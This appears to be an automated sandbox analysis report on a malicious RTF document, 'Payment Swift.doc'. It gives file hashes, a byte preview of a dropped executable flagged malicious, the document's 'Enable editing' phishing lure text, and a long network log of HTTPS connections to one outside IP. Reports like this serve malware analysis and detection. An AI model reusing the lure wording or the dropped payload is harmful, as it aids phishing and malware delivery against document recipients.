                                                                                                                                    SSDEEP:12288:yZ9pzkL1KcPt7sOcflZDLpp8jlMVGdAbNASR8OA10aIkiU:yZ9pzUH7ZEdv8JMVGdGAS210aIki
                                                                                                                                    MD5:75DC78C375DFEE9C0B96FA476BCD5D1C
                                                                                                                                    SHA1:2F61518B7B14B35B9E4FC53C99455C9D2293F139
                                                                                                                                    SHA-256:5EA4437DF5DCC07B35C3959A6FC54D07415D77A659F277FD73F34CCCFBBFE1AD
                                                                                                                                    SHA-512:81673AB01120F7D15675852B4CF3ED020BE1D1BC8494D9DAC213D33324CD22CFE22652FCD85DA06E438C8494FCD19B1E638805651B5412A83AB9912D48015EDB
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2................0..............(... ...@....@.. ....................................@.................................X(..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H...........@ ..............p?..........................................0.1.2.3.4.5.6.7.8.9.....WCF.....Kerberos*.H.........&.(1.....*".......*J.~....t....(6...&*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*".(1....*.(.........(7...~....(....o8...o9....#......*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*"..(=...*..{W...-...}W....
                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):162
                                                                                                                                    Entropy (8bit):2.4797606462020307
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                                                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                                                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                                                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                                                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                    File type:Rich Text Format data, version 1
                                                                                                                                    Entropy (8bit):3.4938105499758296
                                                                                                                                    TrID:
                                                                                                                                    • Rich Text Format (5005/1) 55.56%
                                                                                                                                    • Rich Text Format (4004/1) 44.44%
                                                                                                                                    File name:Payment Swift.doc
                                                                                                                                    File size:139'992 bytes
                                                                                                                                    MD5:67fea5000046ad95ddf9707506002eaa
                                                                                                                                    SHA1:b41f04ef65206c9f0305cc0b124dc9a58f1fe0aa
                                                                                                                                    SHA256:b8fa7245705f07d10b2f028be43ba688ca78ddc224665a2da85d529c124725b1
                                                                                                                                    SHA512:d829fd14378d1ed8a1a056c2a0d0aaf5989dffad2fc1311874a3ec4b7228ca009945b9e74889761e7e1c35f06dcd335758c7b7456c467a0544f21eb1c1ee1f3f
                                                                                                                                    SSDEEP:768:owAbZSibMX9gRWjtwAbZSibMX9gRWjtwAbZSibMX9gRWjJeHe6wUm/IqLUV0/s7B:owAlRkwAlRkwAlRIeHON7LUbTtP
                                                                                                                                    TLSH:82D3AD6DD34B02698F620337AB171E5142BDBA7EF38552B1306C537933EAC39A1252BD
                                                                                                                                    File Content Preview:{\rtf1..{\*\F8pMt6S60258OYh1lcFW6M57GClhx94TnQGEjAamhe5cWZXtxZngF6FJbYdBAV0eCK3GN1ZCTJDxHvbLfDTg6zHB8XujP1hrm1lqcLPFb90ZRHvIBjpvRfCd}..{\108273978please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial st
                                                                                                                                    Icon Hash:2764a3aaaeb7bdbf
                                                                                                                                    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                                                    000007528hno
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Apr 26, 2024 03:05:48.805337906 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:48.805425882 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:48.805496931 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:48.819314957 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:48.819372892 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.099515915 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.099601030 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.105154991 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.105195045 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.105638981 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.105726004 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.175228119 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.216142893 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.676878929 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.676968098 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.677009106 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.677069902 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.677083969 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.677139044 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.677161932 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.677216053 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.677300930 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.677462101 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.677472115 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.677526951 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.677537918 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.677592993 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.677608013 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.677664995 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.677716970 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.677776098 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.677834988 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.677891016 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.677946091 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.678040981 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.678051949 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.678167105 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.681607962 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.811093092 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.811340094 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.811486959 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.811537981 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.811537981 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.811563015 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.811714888 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.811774969 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.811786890 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.811836004 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.811846972 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.811897993 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.811932087 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.811988115 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.812454939 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.812530041 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.812591076 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.812834024 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.812900066 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.812911987 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.812963009 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.813359022 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.813424110 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.813476086 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.813535929 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.813589096 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.813651085 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.813697100 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.813751936 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.813808918 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.813873053 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.814225912 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.814312935 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.814342976 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.814405918 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.814438105 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.814508915 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.957672119 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.957849026 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.957863092 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.957914114 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.957925081 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.957983971 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.957994938 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.958048105 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.958309889 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.958379984 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.958424091 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.958476067 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.958559036 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.958633900 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.958656073 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.958704948 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.958878994 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.958947897 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.958991051 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.959043980 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.960223913 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.960306883 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.960386038 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.960445881 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.960828066 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.960966110 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.961664915 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.961744070 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.961846113 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.961922884 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.962697983 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.962769032 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.962893963 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.962963104 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.963673115 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.963745117 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.964559078 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.964637995 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.964740038 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.964807987 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:49.964819908 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:49.964879990 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.095397949 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.095582962 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.096494913 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.096575975 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.096906900 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.096970081 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.097131014 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.097193956 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.097397089 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.097469091 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.097770929 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.097841024 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.098412037 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.098481894 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.098598003 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.098664045 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.099291086 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.099363089 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.100159883 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.100229979 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.100310087 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.100369930 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.101608992 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.101685047 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.102233887 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.102308989 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.102504015 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.102574110 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.103995085 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.104065895 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.104916096 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.105042934 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.108824968 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.108896017 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.108993053 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.109060049 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.109162092 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.109229088 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.109316111 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.109373093 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.109477043 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.109539986 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.109617949 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.109678984 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.109766006 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.109842062 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.109905958 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.109965086 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.110045910 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.110106945 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.110191107 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.110249996 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.110282898 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.110337973 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.276251078 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.276324987 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.276530027 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.276590109 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.279073954 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.279110909 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.279165030 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.279236078 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.279278040 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.279299021 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.279334068 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.279350996 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.280145884 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.280217886 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.282732010 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.282810926 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.282861948 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.282932043 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.284715891 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.284828901 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.284846067 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.284920931 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.287431955 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.287508011 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.287594080 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.287661076 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.289561987 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.289645910 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.289689064 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.289761066 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.292310953 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.292380095 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.292438984 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.292498112 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.295012951 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.295094013 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.295140982 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.295207024 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.296920061 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.296993017 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.297048092 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.297137022 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.299737930 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.299828053 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.299866915 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.299928904 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.301847935 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.301925898 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.301976919 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.302042961 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.304605961 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.304687023 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.304733992 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.304805040 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.306622982 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.306700945 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.306749105 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.306807041 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.306844950 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.306909084 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.372364998 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.372438908 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.372987032 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.373060942 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.382644892 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.382713079 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.382775068 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.382843018 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.385107040 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.385188103 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.385266066 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.385346889 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.387769938 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.387852907 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.387901068 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.387967110 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.389784098 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.389859915 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.389911890 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.389969110 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.401164055 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.401237011 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.401293039 CEST44349161104.21.83.128192.168.2.22
                                                                                                                                    Apr 26, 2024 03:05:50.401370049 CEST49161443192.168.2.22104.21.83.128
                                                                                                                                    Apr 26, 2024 03:05:50.401370049 CEST49161443192.168.2.22104.21.83.128
